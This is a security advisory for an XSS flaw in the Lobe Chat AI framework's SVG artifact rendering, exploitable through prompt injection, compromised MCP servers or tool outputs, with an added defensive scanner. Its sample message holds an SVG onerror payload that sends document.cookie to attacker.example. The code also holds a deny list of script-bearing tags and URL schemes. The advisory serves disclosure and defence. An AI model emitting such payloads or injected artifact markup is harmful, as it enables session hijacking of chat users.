
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CVE-2025-59417

Severity Medium
Score 6.8/10

Summary

Lobe Chat is an open-source artificial intelligence chat framework. In versions through 1.129.3, there is a Cross-Site Scripting (XSS) vulnerability in how lobe-chat handles chat messages, and it can be escalated to remote code execution on the user's machine. When a server response contains markup such as "<lobeArtifact identifier="ai-new-interpretation" ...>", lobe-chat renders it as a lobeArtifact node instead of as plain text. When the artifact's type is image/svg+xml, it is rendered by the "SVGRender" component, which internally uses "dangerouslySetInnerHTML" to set the SVG content, so active content embedded in the SVG (for example event-handler attributes) runs in the user's session. Any party able to inject content into chat messages, for example by hosting a malicious page used for prompt injection, operating a compromised MCP server, or abusing tool integrations, can exploit this vulnerability.
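The rendering path the summary describes, as an added example that is not lobe-chat's own code: a model/tool message carrying a lobeArtifact of type image/svg+xml is extracted, and instead of handing the SVG straight to an innerHTML sink, it is first scanned for constructs that execute when inserted as inline markup. The lobeArtifact attribute format is taken from the summary; the artifact-parsing regex, the deny list, the URL rules and the sample message are this example's own assumptions, and the scanner is deliberately conservative (it flags a `<script>` element even though browsers do not run scripts inserted via innerHTML, because on* handlers and javascript: links do run and other insertion paths would run the script).

```javascript
// Added example for this advisory; not lobe-chat code. Models the image/svg+xml artifact
// path and a conservative pre-check before anything reaches an innerHTML-style sink.

// Elements rejected outright when found in inline SVG (conservative deny list, an assumption).
const DENY_TAGS = new Set(['script', 'foreignobject', 'iframe', 'object', 'embed', 'use', 'animate', 'set', 'animatetransform']);
// Attributes whose value the browser treats as a URL to navigate or fetch.
const URL_ATTRS = new Set(['href', 'xlink:href', 'src', 'data', 'action', 'formaction']);

const NAMED_ENTITIES = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", colon: ':', tab: '\t', newline: '\n', nbsp: '\u00a0' };

// Decode numeric and a few named entities so "&#106;avascript:" is seen as "javascript:".
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] === '#') {
      const code = body[1].toLowerCase() === 'x' ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(code) && code <= 0x10ffff ? String.fromCodePoint(code) : m;
    }
    const v = NAMED_ENTITIES[body.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// True for script-bearing URL schemes; browsers strip ASCII controls/whitespace before scheme parsing.
function isDangerousUrl(value) {
  const v = decodeEntities(value).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  if (/^(javascript|vbscript):/.test(v)) return true;
  // data: URLs only for raster images; data:image/svg+xml or data:text/html can carry script.
  if (v.startsWith('data:')) return !/^data:image\/(png|jpe?g|gif|webp)[;,]/.test(v);
  return false;
}

// Scan tags and attributes with a small tokenizer; returns { safe, reasons }.
function checkSvg(svgText) {
  const reasons = [];
  const tagRe = /<\s*\/?\s*([a-zA-Z][\w:.-]*)([^>]*)>/g;
  let m;
  while ((m = tagRe.exec(svgText)) !== null) {
    const tag = m[1].toLowerCase();
    if (DENY_TAGS.has(tag)) reasons.push(`element <${tag}>`);
    const attrRe = /([a-zA-Z_:][\w:.-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? '';
      if (name.startsWith('on')) reasons.push(`event handler ${name} on <${tag}>`);
      else if (URL_ATTRS.has(name) && isDangerousUrl(value)) reasons.push(`${name} on <${tag}> is a script URL`);
    }
  }
  return { safe: reasons.length === 0, reasons };
}

// Pull <lobeArtifact ...>...</lobeArtifact> blocks out of a message (format assumed from the summary).
function extractArtifacts(message) {
  const out = [];
  const artifactRe = /<lobeArtifact\b([^>]*)>([\s\S]*?)<\/lobeArtifact>/g;
  let m;
  while ((m = artifactRe.exec(message)) !== null) {
    const attrs = {};
    const attrRe = /([\w:-]+)\s*=\s*"([^"]*)"/g;
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1]] = a[2];
    out.push({ identifier: attrs.identifier ?? '', type: attrs.type ?? '', content: m[2].trim() });
  }
  return out;
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// The decision the vulnerable path skips: inline only SVG that passes the check, else show
// the source as escaped text. Returns what would be assigned to innerHTML.
function renderArtifact(artifact) {
  if (artifact.type !== 'image/svg+xml') return { mode: 'other', html: escapeHtml(artifact.content) };
  const verdict = checkSvg(artifact.content);
  if (verdict.safe) return { mode: 'svg-inline', html: artifact.content };
  return { mode: 'text', html: `<pre>${escapeHtml(artifact.content)}</pre>`, reasons: verdict.reasons };
}

// Constructed sample of a model/tool response in the shape the summary describes.
const SAMPLE_MESSAGE = [
  'Here is the diagram you asked for:',
  '<lobeArtifact identifier="ai-new-interpretation" type="image/svg+xml" title="diagram">',
  '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">',
  '  <circle cx="5" cy="5" r="4" fill="#09f"/>',
  '  <image href="x" onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)"/>',
  '</svg>',
  '</lobeArtifact>',
].join('\n');

function demo() {
  for (const art of extractArtifacts(SAMPLE_MESSAGE)) {
    const r = renderArtifact(art);
    console.log(art.identifier, art.type, '->', r.mode, r.reasons ?? '');
  }
}
demo();
```

A scanner like this is a detection aid, not the fix: the robust remedies are to render untrusted SVG through an `<img>` element (scripts and event handlers do not run there) or to pass it through a maintained sanitizer such as DOMPurify with its SVG profile before any innerHTML-style insertion, ideally behind a Content Security Policy that blocks inline script.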

  • LOW
  • NETWORK
  • LOW
  • CHANGED
  • REQUIRED
  • NONE
  • LOW
  • NONE

CWE-79 - Cross Site Scripting

Cross-Site Scripting, commonly referred to as XSS, is one of the most common classes of web vulnerabilities. It allows an attacker to inject malicious script into a vulnerable web application so that it executes in the browsers of its users. Exploitation can lead to severe consequences such as session hijacking, account takeover, and sensitive data exfiltration. Because of the prevalence of XSS and its high rate of exploitation, it has remained in the OWASP Top 10 for years (since the 2021 edition as part of the broader Injection category).

Advisory Timeline

  • Published